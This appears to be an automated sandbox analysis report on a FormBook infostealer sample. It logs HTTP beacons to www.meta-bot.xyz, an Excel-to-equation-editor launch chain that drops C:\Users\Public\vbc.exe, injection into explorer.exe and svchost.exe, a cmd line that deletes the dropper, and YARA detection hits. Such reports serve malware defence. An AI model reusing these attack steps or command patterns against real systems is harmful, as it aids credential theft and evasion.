                                                                                                                  Data Ascii:
                                                                                                                  Sep 27, 2021 15:41:34.888544083 CEST671INHTTP/1.1 400 Bad Request
                                                                                                                  Server: openresty/1.17.8.2
                                                                                                                  Date: Mon, 27 Sep 2021 13:41:34 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 163
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  4192.168.2.2249171203.170.129.280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 27, 2021 15:41:43.241839886 CEST672OUTGET /scb0/?Fd=BfSM6E5FO5mfZBpeeQrV1vQh+D95EOiFfI1FDjk8ynIPzfiNz31eNoHs9fDCzXb1/NDphw==&w6AxuD=NpI8gJ HTTP/1.1
                                                                                                                  Host: www.meta-bot.xyz
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Sep 27, 2021 15:41:43.443789959 CEST673INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 27 Sep 2021 13:41:43 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Code Manipulations

                                                                                                                  Statistics

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Start time:15:39:21
                                                                                                                  Start date:27/09/2021
                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                  Imagebase:0x13f7a0000
                                                                                                                  File size:28253536 bytes
                                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Start time:15:39:41
                                                                                                                  Start date:27/09/2021
                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:543304 bytes
                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:39:43
                                                                                                                  Start date:27/09/2021
                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                  Imagebase:0x2a0000
                                                                                                                  File size:626688 bytes
                                                                                                                  MD5 hash:0ECA879131A7B104418B085DB7F761C3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Start time:15:39:48
                                                                                                                  Start date:27/09/2021
                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\Public\vbc.exe
                                                                                                                  Imagebase:0x2a0000
                                                                                                                  File size:626688 bytes
                                                                                                                  MD5 hash:0ECA879131A7B104418B085DB7F761C3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Start time:15:39:49
                                                                                                                  Start date:27/09/2021
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                  Imagebase:0xffa10000
                                                                                                                  File size:3229696 bytes
                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:40:06
                                                                                                                  Start date:27/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\svchost.exe
                                                                                                                  Imagebase:0xe20000
                                                                                                                  File size:20992 bytes
                                                                                                                  MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Start time:15:40:10
                                                                                                                  Start date:27/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                  Imagebase:0x4a450000
                                                                                                                  File size:302592 bytes
                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Disassembly

                                                                                                                  Code Analysis

                                                                                                                  Reset < >